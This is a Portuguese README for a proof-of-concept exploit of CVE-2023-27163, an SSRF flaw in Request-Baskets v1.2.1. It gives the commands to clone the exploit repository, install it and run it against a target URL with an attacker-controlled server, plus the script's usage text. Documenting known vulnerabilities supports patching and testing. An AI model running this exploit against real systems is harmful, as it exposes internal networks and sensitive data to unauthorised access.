
Exploit de prova de conceito para CVE-2023-27163: Falsificação de Solicitação do Lado do Servidor (SSRF) no Request-Baskets v1.2.1 através de solicitações de API manipuladas para acessar recursos internos da rede.
Request-Baskets v1.2.1 - Falsificação de solicitação do lado do servidor (SSRF)
Foi descoberto que o request-baskets até a v1.2.1 contém uma vulnerabilidade de falsificação de solicitação do lado do servidor (SSRF) através do componente /api/baskets/{name}. Essa vulnerabilidade permite que atacantes acessem recursos de rede e informações sensíveis por meio de uma solicitação de API manipulada.
git clone https://github.com/0xFTW/CVE-2023-27163
cd CVE-2023-27163
pip3 install -r requirements.txt
python3 CVE-2023-27163.py url attack_server
Script de exploração do Request Baskets
argumentos posicionais:
url caminho principal (/) do servidor (ex: http://127.0.0.1:5000/)
attack_server SERVIDOR_ATAQUE
opções:
-h, --help mostra esta mensagem de ajuda e sai